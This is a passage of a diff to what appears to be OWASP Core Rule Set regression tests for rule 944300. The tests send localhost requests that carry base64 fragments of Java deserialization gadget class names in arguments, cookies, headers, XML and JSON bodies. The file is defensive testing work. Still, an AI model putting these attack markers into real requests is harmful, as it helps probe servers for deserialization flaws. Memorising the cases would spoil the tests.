"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" 
+ uri: "/post" + version: "HTTP/1.0" + data: "test=GNsb25ldHJhbnNmb3JtZXI" + output: + log_contains: "id \"944300\"" + - test_id: 79 desc: "Argument name includes keyword GNsb25ldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "GNsb25ldHJhbnNmb3JtZXI=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-80 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "GNsb25ldHJhbnNmb3JtZXI=test" + output: + log_contains: "id \"944300\"" + - test_id: 80 desc: "Cookie test includes keyword GNsb25ldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=GNsb25ldHJhbnNmb3JtZXI - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-81 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=GNsb25ldHJhbnNmb3JtZXI + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 81 desc: "Cookie name includes keyword GNsb25ldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: GNsb25ldHJhbnNmb3JtZXI=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-82 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: GNsb25ldHJhbnNmb3JtZXI=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 82 desc: "Request header test includes keyword GNsb25ldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: GNsb25ldHJhbnNmb3JtZXI - method: 
"POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-83 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: GNsb25ldHJhbnNmb3JtZXI + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 83 desc: "XML attribute value includes keyword GNsb25ldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-84 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_id: 84 desc: "XML element value includes keyword GNsb25ldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - 
Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "GNsb25ldHJhbnNmb3JtZXI" - output: - log_contains: "id \"944300\"" - - test_title: 944300-85 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "GNsb25ldHJhbnNmb3JtZXI" + output: + log_contains: "id \"944300\"" + - test_id: 85 desc: "Nested XML element value includes keyword GNsb25ldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "GNsb25ldHJhbnNmb3JtZXI" - output: - log_contains: "id \"944300\"" - - test_title: 944300-86 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "GNsb25ldHJhbnNmb3JtZXI" + output: + log_contains: "id \"944300\"" + - test_id: 86 desc: "Content-Type text/plain includes keyword GNsb25ldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=GNsb25ldHJhbnNmb3JtZXI" - output: - log_contains: "id \"944300\"" - - test_title: 944300-87 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=GNsb25ldHJhbnNmb3JtZXI" + output: + log_contains: "id \"944300\"" + - test_id: 87 desc: "Content-Type application/json arg value includes keyword GNsb25ldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"GNsb25ldHJhbnNmb3JtZXI\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-88 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"GNsb25ldHJhbnNmb3JtZXI\"}" + output: + log_contains: "id \"944300\"" + - test_id: 88 desc: "Content-Type application/json arg name includes 
keyword GNsb25ldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"GNsb25ldHJhbnNmb3JtZXI\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-89 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"GNsb25ldHJhbnNmb3JtZXI\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_id: 89 desc: "Argument test includes keyword BjbG9uZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=BjbG9uZXRyYW5zZm9ybWVy" - output: - log_contains: "id \"944300\"" - - test_title: 944300-90 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" 
+ uri: "/post" + version: "HTTP/1.0" + data: "test=BjbG9uZXRyYW5zZm9ybWVy" + output: + log_contains: "id \"944300\"" + - test_id: 90 desc: "Argument name includes keyword BjbG9uZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "BjbG9uZXRyYW5zZm9ybWVy=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-91 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "BjbG9uZXRyYW5zZm9ybWVy=test" + output: + log_contains: "id \"944300\"" + - test_id: 91 desc: "Cookie test includes keyword BjbG9uZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=BjbG9uZXRyYW5zZm9ybWVy - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-92 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=BjbG9uZXRyYW5zZm9ybWVy + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 92 desc: "Cookie name includes keyword BjbG9uZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: BjbG9uZXRyYW5zZm9ybWVy=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-93 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: BjbG9uZXRyYW5zZm9ybWVy=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 93 desc: "Request header test includes keyword BjbG9uZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: BjbG9uZXRyYW5zZm9ybWVy - method: 
"POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-94 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: BjbG9uZXRyYW5zZm9ybWVy + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 94 desc: "XML attribute value includes keyword BjbG9uZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-95 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_id: 95 desc: "XML element value includes keyword BjbG9uZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - 
Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "BjbG9uZXRyYW5zZm9ybWVy" - output: - log_contains: "id \"944300\"" - - test_title: 944300-96 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "BjbG9uZXRyYW5zZm9ybWVy" + output: + log_contains: "id \"944300\"" + - test_id: 96 desc: "Nested XML element value includes keyword BjbG9uZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "BjbG9uZXRyYW5zZm9ybWVy" - output: - log_contains: "id \"944300\"" - - test_title: 944300-97 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "BjbG9uZXRyYW5zZm9ybWVy" + output: + log_contains: "id \"944300\"" + - test_id: 97 desc: "Content-Type text/plain includes keyword BjbG9uZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=BjbG9uZXRyYW5zZm9ybWVy" - output: - log_contains: "id \"944300\"" - - test_title: 944300-98 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=BjbG9uZXRyYW5zZm9ybWVy" + output: + log_contains: "id \"944300\"" + - test_id: 98 desc: "Content-Type application/json arg value includes keyword BjbG9uZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"BjbG9uZXRyYW5zZm9ybWVy\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-99 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"BjbG9uZXRyYW5zZm9ybWVy\"}" + output: + log_contains: "id \"944300\"" + - test_id: 99 desc: "Content-Type application/json arg name includes 
keyword BjbG9uZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"BjbG9uZXRyYW5zZm9ybWVy\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-100 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"BjbG9uZXRyYW5zZm9ybWVy\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_id: 100 desc: "Argument test includes keyword Zm9yY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=Zm9yY2xvc3VyZQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-101 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: 
"/post" + version: "HTTP/1.0" + data: "test=Zm9yY2xvc3VyZQ" + output: + log_contains: "id \"944300\"" + - test_id: 101 desc: "Argument name includes keyword Zm9yY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Zm9yY2xvc3VyZQ=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-102 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Zm9yY2xvc3VyZQ=test" + output: + log_contains: "id \"944300\"" + - test_id: 102 desc: "Cookie test includes keyword Zm9yY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=Zm9yY2xvc3VyZQ - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-103 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=Zm9yY2xvc3VyZQ + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 103 desc: "Cookie name includes keyword Zm9yY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: Zm9yY2xvc3VyZQ=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-104 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: Zm9yY2xvc3VyZQ=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 104 desc: "Request header test includes keyword Zm9yY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: Zm9yY2xvc3VyZQ - method: "POST" - uri: "/post" - version: "HTTP/1.0" - 
